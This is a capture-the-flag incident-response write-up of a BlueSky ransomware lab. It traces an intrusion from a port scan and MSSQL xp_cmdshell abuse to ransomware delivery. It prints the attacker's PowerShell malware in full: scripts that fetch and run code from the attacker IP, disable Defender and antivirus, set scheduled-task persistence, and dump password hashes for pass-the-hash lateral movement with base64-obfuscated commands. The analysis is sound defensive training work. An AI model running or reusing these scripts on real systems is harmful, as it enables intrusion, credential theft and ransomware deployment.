BlueSky Ransomware

Scenario

As a cybersecurity analyst on SecureTech's Incident Response Team, you're tackling an urgent case involving a high-profile corporation that suspects a sophisticated cyber attack on its network. The corporation, which manages critical data across various industries, has experienced a ransomware attack, leading to the encryption of files and an immediate need for expert assistance to mitigate the damages and investigate the breach.

Your role in the team is to conduct a detailed analysis of the evidence to determine the extent and nature of the attack. Your objective is to identify the tactics, techniques, and procedures (TTPs) used by the threat actor to help your client contain the threat and restore the integrity of their network

---

Walkthrough of the incident

First, we need to determine how the attack gained entry into our system. Let's focus on detecting the attacker's active reconnaissance activities.

We can observe that the IP 87.96.21.84 is performing a port scan, as indicated by the rapid frequency and volume of requests

How many open ports did the attacker discover?

Since the attacker is using a normal SYN scan, we can determine this information by checking the SYN-ACK responses from our server 87.96.21.81 to 87.96.21.84.

I used the following query to capture the relevant packets:

tcp.flags.syn == 1 and tcp.flags.ack == 1 and (ip.dst == 87.96.21.84) && (ip.src == 87.96.21.81)

He discovered 5 open TCP ports:

• 445: SMB

• 139: NetBIOS

• 135: Microsoft RPC

• 5357: WS-Discovery

• 1433: Microsoft SQL Server

After the reconnaissance phase, the attacker will choose which service to exploit for the attack. We will track the IP address 87.96.21.84 to determine which port he would start enumerating.

The attacker began enumerating the Microsoft SQL Server and gained access using the sa (system administrator) account.

Then performed some changes

We can notice the following:

1- .show.advanced.options changed from 0 to 1: This suggests that some configuration setting related to showing advanced options was altered

2- .xp_cmdshell Changed from 0 to 1: xp_cmdshell is a feature in Microsoft SQL Server that allows users to execute system-level commands directly from the SQL Server

3- Reconfigure Command: The RECONFIGURE command typically applies changes to SQL Server configurations

Summary

The attacker changed several configurations and enabled xp_cmdshell, likely to facilitate initial access. Following this, they used xp_cmdshell to upload an executable file.

The attacker then added the executable file to the temp directory, renaming it Gjmwb.vbs, which is likely a reverse shell.

This is how the attacker gained initial access.

Following that, the attacker escalated privileges by injecting winlogon.exe using msfconsole. Event ID 400 indicates when a new PowerShell host process has started.

After obtaining administrative privileges, the attacker began downloading various files.

The attacker opened a Python server to upload several PowerShell modules. The previous image shows that he is transferring a file named checking.ps1.

Checking.ps1 code:

$priv = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
$osver = ([environment]::OSVersion.Version).Major

$WarningPreference = "SilentlyContinue"
$ErrorActionPreference = "SilentlyContinue"
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

$url = "http://87.96.21.84"

Function Test-URL {
    param (
        [string]$url
    )
    
    try {
        $request = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 5 -ErrorAction Stop
        if ($request.StatusCode -eq 200) {
            return $true
        } else {
            return $false
        }
    } catch {
        return $false
    }
}

Function Test-ScriptURL {
    param (
        [string]$scriptUrl
    )
    
    try {
        $request = Invoke-WebRequest -Uri $scriptUrl -UseBasicParsing -TimeoutSec 5 -ErrorAction Stop
        if ($request.StatusCode -eq 200) {
            return $true
        } else {
            return $false
        }
    } catch {
        return $false
    }
}

Function StopAV {

    if ($osver -eq "10") {
        Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
    }
    Function Disable-WindowsDefender {

        if ($osver -eq "10") {

            Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
            Set-MpPreference -ExclusionPath "C:\ProgramData\Oracle" -ErrorAction SilentlyContinue
    

            Set-MpPreference -ExclusionPath "C:\ProgramData\Oracle\Java" -ErrorAction SilentlyContinue
            Set-MpPreference -ExclusionPath "C:\Windows" -ErrorAction SilentlyContinue
    

            $defenderRegistryPath = "HKLM:\SOFTWARE\Microsoft\Windows Defender"
            $defenderRegistryKeys = @(
                "DisableAntiSpyware",
                "DisableRoutinelyTakingAction",
                "DisableRealtimeMonitoring",
                "SubmitSamplesConsent",
                "SpynetReporting"
            )
    

            if (-not (Test-Path $defenderRegistryPath)) {
                New-Item -Path $defenderRegistryPath -Force | Out-Null
            }
    

            foreach ($key in $defenderRegistryKeys) {
                Set-ItemProperty -Path $defenderRegistryPath -Name $key -Value 1 -ErrorAction SilentlyContinue
            }
    

            Get-Service WinDefend | Stop-Service -Force -ErrorAction SilentlyContinue
            Set-Service WinDefend -StartupType Disabled -ErrorAction SilentlyContinue
        }
    }
    

    $servicesToStop = "MBAMService", "MBAMProtection", "*Sophos*"
    foreach ($service in $servicesToStop) {
        Get-Service | Where-Object { $_.DisplayName -like $service } | ForEach-Object {
            Stop-Service $_ -ErrorAction SilentlyContinue
            Set-Service $_ -StartupType Disabled -ErrorAction SilentlyContinue
        }
    }
}


Function CleanerEtc {
    $WebClient = New-Object System.Net.WebClient
    $WebClient.DownloadFile("http://87.96.21.84/del.ps1", "C:\ProgramData\del.ps1") | Out-Null
    C:\Windows\System32\schtasks.exe /f /tn "\Microsoft\Windows\MUI\LPupdate" /tr "C:\Windows\System32\cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\ProgramData\del.ps1" /ru SYSTEM /sc HOURLY /mo 4 /create | Out-Null
    Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('http://87.96.21.84/ichigo-lite.ps1'))
}


Function CleanerNoPriv {
    $WebClient = New-Object System.Net.WebClient
    $WebClient.DownloadFile("http://87.96.21.84/del.ps1", "C:\Users\del.ps1") | Out-Null
    C:\Windows\System32\schtasks.exe /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237" /sc HOURLY /f /mo 3 /tr "C:\Windows\System32\cmd.exe /c powershell -ExecutionPolicy Bypass C:\Users\del.ps1" | Out-Null
}

$scriptUrl = "http://87.96.21.84/del.ps1"

if (Test-URL -url $url) {
    Write-Host "Connection to $url successful. Proceeding with execution."
    

    if (Test-ScriptURL -scriptUrl $scriptUrl) {
        Write-Host "Script at $scriptUrl is reachable."

        if ($priv) {
            CleanerEtc

            $encodedDiscovery = "SW52b2tlLUV4cHJlc3Npb24gIndob2FtaSI="
            $decodedDiscovery = [System.Convert]::FromBase64String($encodedDiscovery)
            $commandDiscovery = [System.Text.Encoding]::UTF8.GetString($decodedDiscovery)
            powershell -exec bypass -w 1 $commandDiscovery

            Write-Host "Privilege level: SYSTEM"

        } else {
            CleanerNoPriv
            Write-Host "Privilege level: User"
        }
    } else {
        Write-Host "Script at $scriptUrl is not reachable. Terminating."
        exit
    }
} else {
    Write-Host "Connection to $url failed. Terminating."
    exit
}

if ($priv -eq $true) {
    try {
        StopAV
    } catch {}
    Start-Sleep -Seconds 1
    CleanerEtc
} else {
    CleanerNoPriv

Code Functions Overview

The code includes several functions, with the most important ones summarized below:

1. Test-URL: Checks if a given URL is reachable by using Invoke-WebRequest to send a request. It returns true if the response status code is 200 (OK).

2. Test-ScriptURL: Functions similarly to Test-URL, returning true if the script URL is accessible.

3. StopAV: Disables Windows Defender and other antivirus services if the script is running with administrative privileges.

   • It first checks the OS version, and if it is Windows 10, it disables real-time monitoring for Windows Defender.

   • It modifies Windows Defender registry keys to disable various protections and stops the Windows Defender service.

   • It also stops and disables other security services matching specified names (e.g., "MBAMService," "MBAMProtection," and services with "Sophos" in their display name).

4. CleanerEtc: This function can be used for persistence.

   • Downloads del.ps1 from a specified URL and saves it to C:\ProgramData\.

   • Uses schtasks.exe to create a scheduled task that runs del.ps1 hourly under the SYSTEM account, named LPupdate.

   • Downloads and executes another script (ichigo-lite.ps1) from the same server.

He also downloaded del.ps1

Get-WmiObject _FilterToConsumerBinding -Namespace root\subscription | Remove-WmiObject

$list = "taskmgr", "perfmon", "SystemExplorer", "taskman", "ProcessHacker", "procexp64", "procexp", "Procmon", "Daphne"
foreach($task in $list)
{
    try {
        stop-process -name $task -Force
    }
    catch {}
}

stop-process $pid -Force

Which does the following:

1- Remove WMI Subscriptions(Stopping windows notifications)

2- Terminate Specific Processes in $list variable

He downloaded another module called inchigo-lite.ps1

Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://87.96.21.84/Invoke-PowerDump.ps1')
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://87.96.21.84/Invoke-SMBExec.ps1')

$hostsContent = Invoke-WebRequest -Uri "http://87.96.21.84/extracted_hosts.txt" | Select-Object -ExpandProperty Content -ErrorAction Stop

$EncodedCommand = "KE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vODcuOTYuMjEuODQvSW52b2tlLVBvd2VyRHVtcC5wczEnKSB8IEludm9rZS1FeHByZXNzaW9uDQoNCg=="
Invoke-Expression -Command ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($EncodedCommand)))


$EncodedExec = "SW52b2tlLVBvd2VyRHVtcCB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcUHJvZ3JhbURhdGFcaGFzaGVzLnR4dCI="
Invoke-Expression -Command ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($EncodedExec)))


$usernames = @()
$passwordHashes = @()
$hashesContent = Get-Content -Path "C:\ProgramData\hashes.txt" -ErrorAction SilentlyContinue

if ($hashesContent) {
    foreach ($line in $hashesContent) {
        $pattern =  "^(.*?):\d+:(.*?):(.*?):.*?:"

        if ($line -match $pattern) {
            $username = $matches[1].Trim()
            $passwordHash = $matches[3].Trim()
            $usernames += $username
            $passwordHashes += $passwordHash
        }
    }
}

if ($usernames.Count -gt 0 -and $passwordHashes.Count -gt 0) {
    if ($hostsContent) {
        foreach ($targetHost in $hostsContent -split "`n") {
            if (![string]::IsNullOrWhiteSpace($targetHost)) {
                $username = $usernames[0]
                $password = $passwordHashes[0]
                Invoke-SMBExec -Target $targetHost -Username $username -Hash $password
            }
        }
    } 
}
    
Function Download-FileFromURL {
    param (
        [string]$url,
        [string]$destinationPath
    )

    try {
        $webClient = New-Object System.Net.WebClient
        $webClient.DownloadFile($url, $destinationPath)
        Write-Host "File downloaded from $url to $destinationPath"
        return $true
    } catch {
        Write-Host "Error downloading file from $url"
        return $false
    }
}

$blueUri = "http://87.96.21.84/javaw.exe"
$downloadDestination = "C:\ProgramData\javaw.exe"

$downloadSuccess = Download-FileFromURL -url $blueUri -destinationPath $downloadDestination

if ($downloadSuccess) {
    # Start-Process -FilePath $downloadDestination -ArgumentList "/silent" -NoNewWindow -Wait
}

Code Functionality Overview

The code performs the following actions:

1. Download and Execute Remote Scripts:

   • Invoke-PowerDump.ps1: Used to dump hashes from the local machine.

   • Invoke-SMBExec.ps1: Facilitates command execution for any user using their hash, supporting SMB1 and SMB2.1, with or without SMB signing.

2. Retrieve Hostnames:

   • Downloads a text file containing hostnames (or IP addresses) from a remote server, which could be used for lateral movement. The -ErrorAction Stop parameter ensures the script halts if an error occurs.

3. Base64 Decoding and Command Execution:

   • Decodes some commands to execute the downloaded remote scripts.

4. Extract Usernames and Password Hashes:

   • Reads the file generated by PowerDump and stores the usernames and password hashes in an array for later use.

5. Authenticate Against Remote Hosts:

   • If valid usernames and password hashes are found, it attempts to authenticate to the hosts listed in hostsContent using Invoke-SMBExec.

6. Download a File from a URL:

   • Downloads an executable file named javaw.exe, which is suspected to be ransomware.

After scanning the hash of javaw.exe (3e035f2d7d30869ce53171ef5a0f761bfb9c14d94d9fe6da385e20b8d96dc2fb) using VirusTotal, we can confirm that it is the ransomware used by the attacker, associated with the Conti and Bluesky families.

I hope you enjoyed :)

Lab Link: https://cyberdefenders.org/blueteam-ctf-challenges/bluesky-ransomware/